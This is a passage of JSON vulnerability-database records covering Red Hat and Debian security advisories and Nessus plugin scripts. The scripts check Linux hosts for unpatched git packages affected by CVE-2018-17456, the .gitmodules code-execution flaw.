"2018-10-30T18:56:57", "id": "RHSA-2018:3408", "href": "https://access.redhat.com/errata/RHSA-2018:3408", "type": "redhat", "title": "(RHSA-2018:3408) Important: git security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-03T12:17:46", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "Git is a distributed revision control system with a decentralized architecture. 
As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-02-03T13:51:37", "published": "2020-02-03T13:18:58", "id": "RHSA-2020:0316", "href": "https://access.redhat.com/errata/RHSA-2020:0316", "type": "redhat", "title": "(RHSA-2020:0316) Important: git security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:22", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. 
This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2018-11-12T16:00:53", "published": "2018-11-12T15:58:59", "id": "RHSA-2018:3541", "href": "https://access.redhat.com/errata/RHSA-2018:3541", "type": "redhat", "title": "(RHSA-2018:3541) Important: rh-git29-git security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T05:15:19", "description": "An update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git\nrepository is an exact copy with complete revision history. 
This not\nonly allows the user to work on and contribute to projects without the\nneed to have permission to push the changes to their official\nrepositories, but also makes it possible for the user to work with no\nnetwork connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-31T00:00:00", "title": "RHEL 7 : git (RHSA-2018:3408)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:git-svn", "p-cpe:/a:redhat:enterprise_linux:perl-Git", "p-cpe:/a:redhat:enterprise_linux:git-all", "p-cpe:/a:redhat:enterprise_linux:emacs-git-el", "p-cpe:/a:redhat:enterprise_linux:git", "p-cpe:/a:redhat:enterprise_linux:perl-Git-SVN", "p-cpe:/a:redhat:enterprise_linux:git-gui", "p-cpe:/a:redhat:enterprise_linux:git-gnome-keyring", "p-cpe:/a:redhat:enterprise_linux:gitk", "p-cpe:/a:redhat:enterprise_linux:git-cvs", "p-cpe:/a:redhat:enterprise_linux:gitweb", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:git-instaweb", "p-cpe:/a:redhat:enterprise_linux:git-hg", "p-cpe:/a:redhat:enterprise_linux:git-p4", "p-cpe:/a:redhat:enterprise_linux:git-bzr", "p-cpe:/a:redhat:enterprise_linux:git-debuginfo", "p-cpe:/a:redhat:enterprise_linux:git-daemon", "p-cpe:/a:redhat:enterprise_linux:git-email", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:emacs-git"], "id": "REDHAT-RHSA-2018-3408.NASL", "href": "https://www.tenable.com/plugins/nessus/118555", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory 
RHSA-2018:3408. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118555);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_xref(name:\"RHSA\", value:\"2018:3408\");\n\n script_name(english:\"RHEL 7 : git (RHSA-2018:3408)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git\nrepository is an exact copy with complete revision history. 
This not\nonly allows the user to work on and contribute to projects without the\nneed to have permission to push the changes to their official\nrepositories, but also makes it possible for the user to work with no\nnetwork connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:3408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-17456\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-instaweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3408\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"emacs-git-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"emacs-git-el-1.8.3.1-20.el7\")) flag++;\n\n if 
(rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-all-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-bzr-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-cvs-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-daemon-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-debuginfo-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-debuginfo-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-email-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-gnome-keyring-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-gnome-keyring-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-gui-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-hg-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-instaweb-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-p4-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-svn-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"gitk-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"gitweb-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"perl-Git-1.8.3.1-20.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", 
reference:\"perl-Git-SVN-1.8.3.1-20.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:48:46", "description": "joernchen of Phenoelit discovered that git, a fast, scalable,\ndistributed revision control system, is prone to an arbitrary code\nexecution vulnerability via a specially crafted .gitmodules file in a\nproject cloned with --recurse-submodules.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-09T00:00:00", "title": "Debian DSA-4311-1 : git - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:git", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4311.NASL", "href": "https://www.tenable.com/plugins/nessus/117957", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4311. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117957);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_xref(name:\"DSA\", value:\"4311\");\n\n script_name(english:\"Debian DSA-4311-1 : git - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"joernchen of Phenoelit discovered that git, a fast, scalable,\ndistributed revision control system, is prone to an arbitrary code\nexecution vulnerability via a specially crafted .gitmodules file in a\nproject cloned with --recurse-submodules.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/git\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/git\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4311\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the git packages.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For 
CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"git\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-all\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-arch\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-core\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-cvs\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-daemon-run\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-daemon-sysvinit\", 
reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-doc\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-el\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-email\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-gui\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-man\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-mediawiki\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"git-svn\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"gitk\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"gitweb\", reference:\"1:2.11.0-3+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-15T20:45:27", "description": "Security Fix(es) :\n\n - git: arbitrary code execution via .gitmodules\n (CVE-2018-17456)", "edition": 1, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-02-04T00:00:00", "title": "Scientific Linux Security Update : git on SL6.x i386/x86_64 (20200203)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2020-02-04T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:git-svn", "p-cpe:/a:fermilab:scientific_linux:emacs-git-el", "p-cpe:/a:fermilab:scientific_linux:git-email", "p-cpe:/a:fermilab:scientific_linux:gitk", "p-cpe:/a:fermilab:scientific_linux:git-all", "p-cpe:/a:fermilab:scientific_linux:git-debuginfo", "p-cpe:/a:fermilab:scientific_linux:git-daemon", "p-cpe:/a:fermilab:scientific_linux:git", 
"x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:git-gui", "p-cpe:/a:fermilab:scientific_linux:perl-Git", "p-cpe:/a:fermilab:scientific_linux:gitweb", "p-cpe:/a:fermilab:scientific_linux:emacs-git", "p-cpe:/a:fermilab:scientific_linux:git-cvs"], "id": "SL_20200203_GIT_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/133447", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133447);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-17456\");\n\n script_name(english:\"Scientific Linux Security Update : git on SL6.x i386/x86_64 (20200203)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - git: arbitrary code execution via .gitmodules\n (CVE-2018-17456)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind2002&L=SCIENTIFIC-LINUX-ERRATA&P=79\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?759bc541\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For 
CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is 
owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"emacs-git-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"emacs-git-el-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-all-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-cvs-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-daemon-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-debuginfo-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-email-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", 
reference:\"git-gui-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"git-svn-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"gitk-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"gitweb-1.7.1-10.el6_10\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Git-1.7.1-10.el6_10\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-cvs / git-daemon / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:15:17", "description": "This update for libgit2 fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-17456: Submodule URLs and paths with a leading '-' are now\nignored to avoid 